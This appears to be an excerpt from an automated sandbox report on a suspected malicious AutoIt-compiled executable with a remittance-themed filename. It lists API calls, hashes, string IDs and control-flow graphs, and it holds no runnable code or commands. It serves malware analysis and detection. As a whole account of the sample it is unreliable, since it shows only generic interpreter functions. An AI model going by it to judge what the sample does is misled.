                                                                      • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                      • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                      • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                      • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                      • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                      • TranslateMessage.USER32(?), ref: 00409556
                                                                      • DispatchMessageW.USER32(?), ref: 00409561
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Peek$DispatchSleepTranslate
                                                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                      • API String ID: 1762048999-758534266
                                                                      • Opcode ID: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                                      • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                      • Opcode Fuzzy Hash: 23d079a985ba2b1b40b9133d067a4c416b55a71ed9da253c2d941bd9d0d29544
                                                                      • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,00000104,?), ref: 00401F4C
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • __wcsicoll.LIBCMT ref: 00402007
                                                                      • __wcsicoll.LIBCMT ref: 0040201D
                                                                      • __wcsicoll.LIBCMT ref: 00402033
                                                                        • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                      • __wcsicoll.LIBCMT ref: 00402049
                                                                      • _wcscpy.LIBCMT ref: 0040207C
                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,00000104), ref: 00428B5B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe$CMDLINE$CMDLINERAW
                                                                      • API String ID: 3948761352-1155694392
                                                                      • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                      • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                      • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                      • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock$_fseek_wcscpy
                                                                      • String ID: D)E$D)E$FILE
                                                                      • API String ID: 3888824918-361185794
                                                                      • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                      • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                      • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                      • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                      • __wsplitpath.LIBCMT ref: 0040E41C
                                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                      • _wcsncat.LIBCMT ref: 0040E433
                                                                      • __wmakepath.LIBCMT ref: 0040E44F
                                                                        • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                      • _wcscpy.LIBCMT ref: 0040E487
                                                                        • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                      • _wcscat.LIBCMT ref: 00427541
                                                                      • _wcslen.LIBCMT ref: 00427551
                                                                      • _wcslen.LIBCMT ref: 00427562
                                                                      • _wcscat.LIBCMT ref: 0042757C
                                                                      • _wcsncpy.LIBCMT ref: 004275BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                      • String ID: Include$\
                                                                      • API String ID: 3173733714-3429789819
                                                                      • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                      • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                      • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                      • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • _fseek.LIBCMT ref: 0045292B
                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                        • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                        • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                      • __fread_nolock.LIBCMT ref: 00452961
                                                                      • __fread_nolock.LIBCMT ref: 00452971
                                                                      • __fread_nolock.LIBCMT ref: 0045298A
                                                                      • __fread_nolock.LIBCMT ref: 004529A5
                                                                      • _fseek.LIBCMT ref: 004529BF
                                                                      • _malloc.LIBCMT ref: 004529CA
                                                                      • _malloc.LIBCMT ref: 004529D6
                                                                      • __fread_nolock.LIBCMT ref: 004529E7
                                                                      • _free.LIBCMT ref: 00452A17
                                                                      • _free.LIBCMT ref: 00452A20
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                      • String ID:
                                                                      • API String ID: 1255752989-0
                                                                      • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                      • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                      • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                      • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                      • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                      • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                      • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                      • ImageList_ReplaceIcon.COMCTL32(00AB18C0,000000FF,00000000), ref: 00410552
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                      • API String ID: 2914291525-1005189915
                                                                      • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                      • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                      • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                      • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                      • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                      • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                      • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                      • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                      • RegisterClassExW.USER32(?), ref: 0041045D
                                                                        • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                        • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                        • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                        • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                        • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                        • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                        • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AB18C0,000000FF,00000000), ref: 00410552
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                      • String ID: #$0$AutoIt v3
                                                                      • API String ID: 423443420-4155596026
                                                                      • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                      • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                      • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                      • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _malloc
                                                                      • String ID: Default
                                                                      • API String ID: 1579825452-753088835
                                                                      • Opcode ID: 443df2c3c68efbd16d3948df002b7be0acb455de1234585f427717e2e3840c69
                                                                      • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                      • Opcode Fuzzy Hash: 443df2c3c68efbd16d3948df002b7be0acb455de1234585f427717e2e3840c69
                                                                      • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1970 40f696-40f69c 1966->1970 1968 40f660-40f674 call 4150d1 1967->1968 1969 40f63e 1967->1969 1974 40f679-40f67c 1968->1974 1971 40f640 1969->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1968 1977->1971 1991 425d43-425d5f call 414d30 1978->1991 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1984 425d16 1982->1984 1985 40f6c8-40f6d6 1982->1985 1983->1975 1984->1978 1987 425d05-425d0b 1985->1987 1988 40f6dc-40f6df 1985->1988 1987->1973 1990 425d11 1987->1990 1988->1975 1990->1984 1991->1970
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: __fread_nolock_fseek_memmove_strcat
                                                                      • String ID: AU3!$EA06
                                                                      • API String ID: 1268643489-2658333250
                                                                      • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                      • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                      • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                      • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2002 40112c-401141 DefWindowProcW 1997->2002 2000 401184-40118e call 401250 1998->2000 2001 40114c-40114f 1998->2001 1999->1998 2003 401120-401126 1999->2003 2011 401193-40119a 2000->2011 2005 401151-401157 2001->2005 2006 40119d 2001->2006 2003->2002 2004 42b038-42b03f 2003->2004 2004->2002 2010 42b045-42b059 call 401000 call 40e0c0 2004->2010 2008 401219-40121f 2005->2008 2009 40115d 2005->2009 2012 4011a3-4011a9 2006->2012 2013 42afb4-42afc5 call 40f190 2006->2013 2008->2003 2016 401225-42b06d call 468b0e 2008->2016 2014 401163-401166 2009->2014 2015 42b01d-42b024 2009->2015 2010->2002 2012->2003 2019 4011af 2012->2019 2013->2011 2023 42afe9-42b018 call 40f190 call 401a50 2014->2023 2024 40116c-401172 2014->2024 2015->2002 2022 42b02a-42b033 call 4370f4 2015->2022 2016->2011 2019->2003 2020 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2019->2020 2021 4011db-401202 SetTimer RegisterWindowMessageW 2019->2021 2021->2011 2029 401204-401216 CreatePopupMenu 2021->2029 2022->2002 2023->2002 2024->2003 2031 401174-42afde call 45fd57 2024->2031 2031->2002 2045 42afe4 2031->2045 2045->2011
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                      • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                      • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                      • CreatePopupMenu.USER32 ref: 00401204
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                      • String ID: TaskbarCreated
                                                                      • API String ID: 129472671-2362178303
                                                                      • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                      • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                      • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                      • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 004115F1
                                                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                      • std::exception::exception.LIBCMT ref: 00411626
                                                                      • std::exception::exception.LIBCMT ref: 00411640
                                                                      • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                      • String ID: ,*H$4*H$@fI
                                                                      • API String ID: 615853336-1459471987
                                                                      • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
